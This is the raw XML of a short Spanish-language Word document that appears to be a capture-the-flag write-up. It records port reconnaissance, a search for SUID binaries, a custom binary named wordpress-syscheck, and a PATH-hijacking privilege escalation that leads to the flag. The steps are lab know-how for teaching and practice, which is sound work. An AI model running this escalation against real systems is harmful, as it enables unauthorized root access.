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Fase de reconocimiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>puerto 631 abierto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19500" cy="466725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dirb sin resultados utiles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 la búsqueda de binarios SUID (find / -perm -4000 2&gt;/dev/null) apareció algo inusual:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/usr/local/bin/wordpress-syscheck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65225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="2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creamos un nuevo directorio de trabajo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mkdir /tmp/pwn &amp;&amp; cd /tmp/pwn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48300" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="3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Secuestra</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mos</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> el PATH y ejecutar el SUID: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export PATH=/tmp/pwn:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/usr/local/bin/wordpress-syscheck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48325" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="4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 encontramos la flag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05375" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="5" name="Imagen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24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V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VE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2</Pages>
  <Words>50</Words>
  <Characters>334</Characters>
  <CharactersWithSpaces>373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2026-09-21T10:55:50Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>es-VE</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-21T11:25:32Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>